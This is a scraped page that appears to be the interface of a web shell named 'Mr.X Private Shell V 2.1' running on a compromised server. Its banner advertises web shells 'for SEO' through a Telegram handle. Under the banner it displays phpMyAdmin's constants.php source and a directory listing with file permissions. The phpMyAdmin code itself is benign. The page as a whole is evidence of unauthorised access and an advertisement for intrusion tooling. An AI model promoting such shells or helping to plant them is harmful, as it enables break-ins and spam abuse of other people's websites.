__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
declare(strict_types=1);
if (! defined('PHPMYADMIN')) {
exit;
}
$vendorConfig = require_once ROOT_PATH . 'libraries/vendor_config.php';
if (
! is_array($vendorConfig) || ! isset(
$vendorConfig['autoloadFile'],
$vendorConfig['tempDir'],
$vendorConfig['changeLogFile'],
$vendorConfig['licenseFile'],
$vendorConfig['sqlDir'],
$vendorConfig['configFile'],
$vendorConfig['customHeaderFile'],
$vendorConfig['customFooterFile'],
$vendorConfig['versionCheckDefault'],
$vendorConfig['localePath'],
$vendorConfig['cacheDir'],
$vendorConfig['versionSuffix']
)
) {
exit;
}
// phpcs:disable PSR1.Files.SideEffects
define('AUTOLOAD_FILE', (string) $vendorConfig['autoloadFile']);
define('TEMP_DIR', (string) $vendorConfig['tempDir']);
define('CHANGELOG_FILE', (string) $vendorConfig['changeLogFile']);
define('LICENSE_FILE', (string) $vendorConfig['licenseFile']);
define('SQL_DIR', (string) $vendorConfig['sqlDir']);
define('CONFIG_FILE', (string) $vendorConfig['configFile']);
define('CUSTOM_HEADER_FILE', (string) $vendorConfig['customHeaderFile']);
define('CUSTOM_FOOTER_FILE', (string) $vendorConfig['customFooterFile']);
define('VERSION_CHECK_DEFAULT', (bool) $vendorConfig['versionCheckDefault']);
define('LOCALE_PATH', (string) $vendorConfig['localePath']);
define('CACHE_DIR', (string) $vendorConfig['cacheDir']);
define('VERSION_SUFFIX', (string) $vendorConfig['versionSuffix']);
/**
* TCPDF workaround. Avoid referring to nonexistent files (causes warnings when open_basedir is used).
* This is defined to avoid the TCPDF code to search for a directory outside of open_basedir.
* This value if not used but is useful, no header logic is used for PDF exports.
*
* @see https://github.com/phpmyadmin/phpmyadmin/issues/16709
*/
define('K_PATH_IMAGES', ROOT_PATH);
// phpcs:enable
unset($vendorConfig);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| cache | Folder | 0755 |
|
|
| classes | Folder | 0755 |
|
|
| advisory_rules_generic.php | File | 36.04 KB | 0644 |
|
| advisory_rules_mysql_before80003.php | File | 6.19 KB | 0644 |
|
| config.default.php | File | 70.96 KB | 0644 |
|
| config.values.php | File | 13.17 KB | 0644 |
|
| constants.php | File | 1.88 KB | 0644 |
|
| language_stats.inc.php | File | 1.63 KB | 0644 |
|
| routes.php | File | 19.5 KB | 0644 |
|
| services.php | File | 7.69 KB | 0644 |
|
| services_controllers.php | File | 65.17 KB | 0644 |
|
| services_loader.php | File | 1.59 KB | 0644 |
|
| vendor_config.php | File | 2.06 KB | 0644 |
|